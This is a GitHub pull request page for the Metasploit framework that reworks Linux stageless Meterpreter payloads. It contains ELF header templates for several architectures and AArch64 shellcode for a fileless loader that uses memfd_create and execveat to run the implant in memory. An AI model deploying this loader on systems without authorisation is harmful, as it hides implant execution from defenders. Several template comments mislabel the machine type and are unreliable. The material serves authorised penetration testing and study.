-
Notifications
You must be signed in to change notification settings - Fork 14.6k
Fix Linux Stageless Payload to be Shellcodes #19799
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Open
dledda-r7
wants to merge
61
commits into
rapid7:master
Choose a base branch
from
dledda-r7:fix/mettle-stageless-payload
base: master
Could not load branches
Branch not found: {{ refName }}
Loading
Could not load tags
Nothing to show
Loading
Are you sure you want to change the base?
Some commits from the old base branch may be removed from the timeline,
and old review comments may become outdated.
Open
Changes from 53 commits
Commits
Show all changes
61 commits
Select commit
Hold shift + click to select a range
0f7541f
fix: removing unnecessary elf parsing in linux/x86/meterpreter
dledda-r7 9f14e10
feat(payload): linux/x86 in_memory_loader for stageless meterpreter
dledda-r7 5efa886
feat(payload): linux/x86 in_memory_loader itoa improvement
dledda-r7 305e0d0
feat(payload): linux/x64 in_memory_loader for stageless meterpreter
dledda-r7 69b4b2b
Shellcode for memfd_create for ARM
msutovsky-r7 226546b
Armbe draft and ARM64 functional payload for memfd_create
msutovsky-r7 e30386a
Adding itoa for ARMle stageless payload
msutovsky-r7 3217099
Adding itoa function for ARM64 and ARMbe
msutovsky-r7 5908b87
Adding itoa function for ARM64 and ARMbe
msutovsky-r7 1393a05
feat(payload): linux/mipsel in_memory_loader for stageless meterpreter
dledda-r7 39e8ead
feat(payload): linux/mips in_memory_loader for stageless meterpreter
dledda-r7 0a4ca9f
fix: move meterpreter_loader into separate mixin
dledda-r7 27d011f
fix: move x64 meterpreter_loader into separate mixin
dledda-r7 e9779a1
fix: move mipsbe and mipsle meterpreter_loader into separate mixin
dledda-r7 c7b9514
PPC64le init
msutovsky-r7 862d2ba
PPC64 shellcode added, adding PPC initial work
msutovsky-r7 168865c
PPC progress
msutovsky-r7 2cea579
wPowerPC stageless payload
msutovsky-r7 4a04feb
feat: add mips64 elf template and meterpreter_loader
dledda-r7 97c04d1
fix: fix exe after merge issue
dledda-r7 23459f7
ARMBe and Zarch stageless payload
msutovsky-r7 26d59ca
Code refactor, loader delivery update
msutovsky-r7 711e3c4
fix: improved x86 and x64 shellcodes
dledda-r7 50c402b
fix: updated mettle payload generation and cached_size
dledda-r7 fde9a93
fix: updated mettle payload generation and cached_size
dledda-r7 1ab698a
Fixed missing payload length for AARCH64
msutovsky-r7 370124e
Rubocoping AARCH64 payload modules
msutovsky-r7 50b2d05
Aarch64 comments
msutovsky-r7 3791e0e
Add armbe/armle comments
msutovsky-r7 4272db0
feat: add elf-legacy option for systems unsupported by in_memory_loader
dledda-r7 3a8eac1
Adding comments for PPC
msutovsky-r7 f9de30b
Add build script
msutovsky-r7 c317f4e
Uses execveat syscall to make loader stub smaller
msutovsky-r7 da89d6c
Adds execveat for MIPS64, PPC64 and Zarch
msutovsky-r7 394c01a
Updates cached_sizes and rubocop
msutovsky-r7 ff0bfcb
Adds comments for ARM, Mips and PPC
msutovsky-r7 96f83bf
Adds comments for zarch
msutovsky-r7 4a074ef
fix: changing MeterpreterLegacyElf to MeterpreterLinuxMinKernel
dledda-r7 47eea6f
fix: including prepends mixin on linux stageless meterpreter
dledda-r7 0c3103d
fix: updating MeterpreterLinuxMinKernel default value, displaying war…
dledda-r7 ec14ed0
fix: align assembly comments, add single build instructions
dledda-r7 4c8e5ba
chore: linting meterpreter_loader and prepends
dledda-r7 1aaeba0
Adds convetion for each architecture
msutovsky-r7 bcb43ec
Fixed comments
msutovsky-r7 27f69bf
fix: changes based on review comments
dledda-r7 6e29b01
Fixing mipsbe loader stub
msutovsky-r7 43b1677
fix: update cached size
dledda-r7 07ff496
fix: update cached size
dledda-r7 c3118cb
fix: update cached size
dledda-r7 38b63f5
chore: remove white-space
dledda-r7 4cb91b7
Update lib/msf/core/payload/linux/mipsbe/prepends.rb
dledda-r7 a27a0cb
fix: update util/exe.rb to support new linux templates, code refactoring
dledda-r7 7f5f264
Update modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
dledda-r7 dd8e5a3
Update modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
dledda-r7 a3106eb
Update modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
dledda-r7 7e46f37
fix: minor fix linux elf templates
dledda-r7 3b2a840
fix: removed + character in PayloadLinuxMinKernel
dledda-r7 b42b7e8
fix: fix linux prepends, uniform ppc prepends
dledda-r7 44b0917
Rolling back arm/arm64 to exec syscall
msutovsky-r7 9bec2e3
Rolling back ppc/ppc64/ppce500v2 to exec syscall
msutovsky-r7 8d29138
Rolling back zarch to exec syscall
msutovsky-r7 File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,8 @@ | ||
| #!/bin/sh | ||
|
|
||
| dst_folder="../../../" | ||
| for file in $(find ./ -name "*.s") | ||
| do | ||
| arch=`echo $file | cut -d "_" -f2`; | ||
| nasm -f bin $file -o $dst_folder"template_"$arch"_linux.bin" | ||
| done |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,37 @@ | ||
| ; build with: | ||
| ; nasm elf_armbe_template.s -f bin -o template_armbe_linux.bin | ||
|
|
||
| BITS 32 | ||
| ehdr: ; Elf32_Ehdr | ||
| db 0x7F, "ELF", 1, 2, 1, 0 ; e_ident | ||
| db 0, 0, 0, 0, 0, 0, 0, 0 ; | ||
| dw 0x0200 ; e_type = ET_EXEC for an executable | ||
| dw 0x2800 ; e_machine = AARCH64 | ||
| dd 0x01000000 ; e_version | ||
| dd 0x54800000 ; e_entry | ||
| dd 0x34000000 ; e_phoff | ||
| dd 0 ; e_shoff | ||
| dd 0 ; e_flags | ||
| dw 0x3400 ; e_ehsize | ||
| dw 0x2000 ; e_phentsize | ||
| dw 0x0100 ; e_phnum | ||
| dw 0 ; e_shentsize | ||
| dw 0 ; e_shnum | ||
| dw 0 ; e_shstrndx | ||
|
|
||
| ehdrsize equ $ - ehdr | ||
|
|
||
| phdr: ; Elf32_Phdr | ||
|
|
||
| dd 0x01000000 ; p_type = pt_load | ||
| dd 0 ; p_offset | ||
| dd 0x00800000 ; p_vaddr | ||
| dd 0x00800000 ; p_paddr | ||
| dd 0xefbeadde ; p_filesz | ||
| dd 0xefbeadde ; p_memsz | ||
| dd 0x07000000 ; p_flags = rwx | ||
| dd 0x00100000 ; p_align | ||
|
|
||
| phdrsize equ $ - phdr | ||
|
|
||
| _start: | ||
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,55 @@ | ||
| ; build with: | ||
| ; nasm elf_mips64_template.s -f bin -o template_mips64_linux.bin | ||
|
|
||
| %define WORD_BE(value) (((value & 0xFF) << 8) | ((value >> 8) & 0xFF)) | ||
| %define DWORD_BE(dword) (((dword & 0xFF) << 24) | \ | ||
| ((dword & 0xFF00) << 8) | \ | ||
| ((dword >> 8) & 0xFF00) | \ | ||
| ((dword >> 24) & 0xFF)) | ||
| %define QWORD_BE(qword) ( \ | ||
| ((qword & 0x00000000000000FF) << 56) | \ | ||
| ((qword & 0x000000000000FF00) << 40) | \ | ||
| ((qword & 0x0000000000FF0000) << 24) | \ | ||
| ((qword & 0x00000000FF000000) << 8) | \ | ||
| ((qword >> 8) & 0x000000FF00000000) | \ | ||
| ((qword >> 24) & 0x0000FF0000000000) | \ | ||
| ((qword >> 40) & 0x00FF000000000000) | \ | ||
| ((qword >> 56) & 0xFF00000000000000) ) | ||
|
|
||
| BITS 64 | ||
|
|
||
| org 0x400000 | ||
| ehdr: ; Elf32_Ehdr | ||
| db 0x7F, "ELF", 2, 2, 1, 0 ; e_ident | ||
| db 0, 0, 0, 0, 0, 0, 0, 0 ; | ||
| dw WORD_BE(2) ; e_type = ET_EXEC for an executable | ||
| dw WORD_BE(0x08) ; e_machine = MIPS | ||
| dd 0 ; e_version | ||
| dq QWORD_BE(0x400078) ; e_entry | ||
| dq QWORD_BE(0x40) ; e_phoff | ||
| dq 0 ; e_shoff | ||
| dd 0 ; e_flags | ||
| dw WORD_BE(0x40) ; e_ehsize | ||
| dw WORD_BE(0x38) ; e_phentsize | ||
| dw WORD_BE(0x1) ; e_phnum | ||
| dw 0 ; e_shentsize | ||
| dw 0 ; e_shnum | ||
| dw 0 ; e_shstrndx | ||
|
|
||
| ehdrsize equ $ - ehdr | ||
|
|
||
| phdr: ; Elf32_Phdr | ||
| dd DWORD_BE(1) ; p_type = PT_LOAD | ||
| dd DWORD_BE(7) ; p_flags = rwx | ||
| dq 0 ; p_offset | ||
| dq QWORD_BE(0x400000) ; p_vaddr | ||
| dq QWORD_BE(0x400000) ; p_paddr | ||
| dq QWORD_BE(0xA00000) ; p_filesz | ||
| dq QWORD_BE(0xA00000) ; p_memsz | ||
| dq QWORD_BE(0x1000) ; p_align | ||
|
|
||
| phdrsize equ $ - phdr | ||
|
|
||
| global _start | ||
|
|
||
| _start: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,40 @@ | ||
| ; build with: | ||
bwatters-r7 marked this conversation as resolved.
Show resolved
Hide resolved
|
||
| ; nasm elf_ppc64le_template.s -f bin -o template_ppc64le_linux.bin | ||
|
|
||
| BITS 64 | ||
|
|
||
| org 0x400000 | ||
|
|
||
| ehdr: ; Elf32_Ehdr | ||
| db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident | ||
| db 0, 0, 0, 0, 0, 0, 0, 0 ; | ||
| dw 2 ; e_type = ET_EXEC for an executable | ||
| dw 0x15 ; e_machine = PowerPC | ||
| dd 0 ; e_version | ||
| dq _start ; e_entry | ||
| dq phdr - $$ ; e_phoff | ||
| dq 0 ; e_shoff | ||
| dd 0 ; e_flags | ||
| dw ehdrsize ; e_ehsize | ||
| dw phdrsize ; e_phentsize | ||
| dw 1 ; e_phnum | ||
| dw 0 ; e_shentsize | ||
| dw 0 ; e_shnum | ||
| dw 0 ; e_shstrndx | ||
|
|
||
| ehdrsize equ $ - ehdr | ||
|
|
||
| phdr: ; Elf32_Phdr | ||
| dd 1 ; p_type = PT_LOAD | ||
| dd 7 ; p_flags = rwx | ||
| dq 0 ; p_offset | ||
| dq $$ ; p_vaddr | ||
| dq $$ ; p_paddr | ||
| dq 0xDEADBEEF ; p_filesz | ||
| dq 0xDEADBEEF ; p_memsz | ||
| dq 0x1000 ; p_align | ||
|
|
||
| phdrsize equ $ - phdr | ||
|
|
||
| _start: | ||
| dq _start+0x8 | ||
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,37 @@ | ||
| ; build with: | ||
| ; nasm elf_ppc_template.s -f bin -o template_ppc_linux.bin | ||
|
|
||
| BITS 32 | ||
| ehdr: ; Elf32_Ehdr | ||
| db 0x7F, "ELF", 1, 2, 1, 0 ; e_ident | ||
| db 0, 0, 0, 0, 0, 0, 0, 0 ; | ||
| dw 0x0200 ; e_type = ET_EXEC for an executable | ||
| dw 0x1400 ; e_machine = AARCH64 | ||
| dd 0x01000000 ; e_version | ||
| dd 0x54100000 ; e_entry | ||
| dd 0x34000000 ; e_phoff | ||
| dd 0 ; e_shoff | ||
| dd 0 ; e_flags | ||
| dw 0x3400 ; e_ehsize | ||
| dw 0x2000 ; e_phentsize | ||
| dw 0x0100 ; e_phnum | ||
| dw 0 ; e_shentsize | ||
| dw 0 ; e_shnum | ||
| dw 0 ; e_shstrndx | ||
|
|
||
| ehdrsize equ $ - ehdr | ||
|
|
||
| phdr: ; Elf32_Phdr | ||
|
|
||
| dd 0x01000000 ; p_type = pt_load | ||
| dd 0 ; p_offset | ||
| dd 0x00100000 ; p_vaddr | ||
| dd 0x00100000 ; p_paddr | ||
| dd 0xefbeadde ; p_filesz | ||
| dd 0xefbeadde ; p_memsz | ||
| dd 0x07000000 ; p_flags = rwx | ||
| dd 0x00000100 ; p_align | ||
|
|
||
| phdrsize equ $ - phdr | ||
|
|
||
| _start: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,37 @@ | ||
| ; build with: | ||
| ; nasm elf_ppce500v2_template.s -f bin -o template_ppce500v2_linux.bin | ||
|
|
||
| BITS 32 | ||
| ehdr: ; Elf32_Ehdr | ||
| db 0x7F, "ELF", 1, 2, 1, 0 ; e_ident | ||
| db 0, 0, 0, 0, 0, 0, 0, 0 ; | ||
| dw 0x0200 ; e_type = ET_EXEC for an executable | ||
| dw 0x1400 ; e_machine = AARCH64 | ||
| dd 0x01000000 ; e_version | ||
| dd 0x54100000 ; e_entry | ||
| dd 0x34000000 ; e_phoff | ||
| dd 0 ; e_shoff | ||
| dd 0 ; e_flags | ||
| dw 0x3400 ; e_ehsize | ||
| dw 0x2000 ; e_phentsize | ||
| dw 0x0100 ; e_phnum | ||
| dw 0 ; e_shentsize | ||
| dw 0 ; e_shnum | ||
| dw 0 ; e_shstrndx | ||
|
|
||
| ehdrsize equ $ - ehdr | ||
|
|
||
| phdr: ; Elf32_Phdr | ||
|
|
||
| dd 0x01000000 ; p_type = pt_load | ||
| dd 0 ; p_offset | ||
| dd 0x00100000 ; p_vaddr | ||
| dd 0x00100000 ; p_paddr | ||
| dd 0xefbeadde ; p_filesz | ||
| dd 0xefbeadde ; p_memsz | ||
| dd 0x07000000 ; p_flags = rwx | ||
| dd 0x00000100 ; p_align | ||
|
|
||
| phdrsize equ $ - phdr | ||
|
|
||
| _start: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,34 @@ | ||
| ; build with: | ||
| ; nasm elf_zarch_template.s -f bin -o template_zarch_linux.bin | ||
|
|
||
| BITS 64 | ||
|
|
||
|
|
||
| ehdr: ; Elf32_Ehdr | ||
| db 0x7F, "ELF", 2, 2, 1, 0 ; e_ident | ||
| db 0, 0, 0, 0, 0, 0, 0, 0 ; | ||
| dw 0x0200 ; e_type = ET_EXEC for an executable | ||
| dw 0x1600 ; e_machine = PowerPC | ||
| dd 0x01000000 ; e_version | ||
| dq 0x7810000000000000 ; e_entry | ||
| dq 0x4000000000000000 ; e_phoff | ||
| dq 0 ; e_shoff | ||
| dd 0 ; e_flags | ||
| dw 0x4000 ; e_ehsize | ||
| dw 0x3800 ; e_phentsize | ||
| dw 0x0100 ; e_phnum | ||
| dw 0 ; e_shentsize | ||
| dw 0 ; e_shnum | ||
| dw 0 ; e_shstrndx | ||
|
|
||
| phdr: ; Elf32_Phdr | ||
| dd 0x01000000 ; p_type = PT_LOAD | ||
| dd 0x07000000 ; p_flags = rwx | ||
| dq 0 ; p_offset | ||
| dq 0x0010000000000000 ; p_vaddr | ||
| dq 0x0010000000000000 ; p_paddr | ||
| dq 0xDEADBEEF ; p_filesz | ||
| dq 0xDEADBEEF ; p_memsz | ||
| dq 0x0000100000000000 ; p_align | ||
|
|
||
| _start: |
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,50 @@ | ||
| # | ||
| # In memory loader used to execute Mettle ELF file. | ||
| # Compatible with Kernel Linux >= 3.17 (where memfd_create is introduced) | ||
| # Author: Martin Sutovsky <martin_sutovsky[at]rapid7.com> | ||
| # Resource and Credits: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html | ||
| # ARM64 conventions | ||
| # Parameters: x0-x7 | ||
| # Syscall offset: x8 | ||
| # Return Address for BL: x30 | ||
| # | ||
| module Msf::Payload::Linux::Aarch64::ElfLoader | ||
| def in_memory_load(payload) | ||
| in_memory_loader = [ | ||
| # fd = memfd_create(NULL,MFD_CLOEXEC) | ||
| 0x0a0080d2, # 0x1000: mov x10, #0 0x0a0080d2 | ||
| 0xea0300f9, # 0x1004: str x10, [sp] 0xea0300f9 | ||
| 0xe0030091, # 0x1008: mov x0, sp 0xe0030091 | ||
| 0x210080d2, # 0x100c: mov x1, #1 0x210080d2 | ||
| 0xe82280d2, # 0x1010: mov x8, #0x117 0xe82280d2 | ||
| 0x010000d4, # 0x1014: svc #0 0x010000d4 | ||
| 0xe90300aa, # 0x1018: mov x9, x0 0xe90300aa | ||
|
|
||
| # jump to 0x105c | ||
| 0x10000014, # 0x101c: b #0x105c 0x10000014 | ||
|
|
||
| # write(fd, payload length, payload pointer) | ||
| 0xea031eaa, # 0x1020: mov x10, x30 0xea031eaa | ||
| 0x420140b9, # 0x1024: ldr w2, [x10] 0x420140b9 | ||
| 0x4a110091, # 0x1028: add x10, x10, #4 0x4a110091 | ||
| 0xe1030aaa, # 0x102c: mov x1, x10 0xe1030aaa | ||
| 0x080880d2, # 0x1030: mov x8, #0x40 0x080880d2 | ||
| 0x010000d4, # 0x1034: svc #0 0x010000d4 | ||
|
|
||
| # execveat(fd, null,null,null, AT_EMPTY_PATH) | ||
| 0xe00309aa, # 0x1038: mov x0, x9 0xe00309aa | ||
| 0x0a0080d2, # 0x103c: mov x10, #0 0x0a0080d2 | ||
| 0xea0300f9, # 0x1040: str x10, [sp] 0xea0300f9 | ||
| 0xe1030091, # 0x1044: mov x1, sp 0xe1030091 | ||
| 0x020080d2, # 0x1048: mov x2, #0 0x020080d2 | ||
| 0x030080d2, # 0x104c: mov x3, #0 0x030080d2 | ||
| 0x040082d2, # 0x1050: mov x4, #0x1000 0x040082d2 | ||
| 0x282380d2, # 0x1054: mov x8, #0x119 0x282380d2 | ||
| 0x010000d4, # 0x1058: svc #0 0x010000d4 | ||
|
|
||
| # jump back to 0x1020, the address right after this instruction will be stored in x30 | ||
| 0xf1ffff97, # 0x105c: bl #0x1020 0xf1ffff97 | ||
| ].pack('N*') | ||
| in_memory_loader + [payload.length].pack('V*') | ||
| end | ||
| end |
Oops, something went wrong.
Oops, something went wrong.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Uh oh!
There was an error while loading. Please reload this page.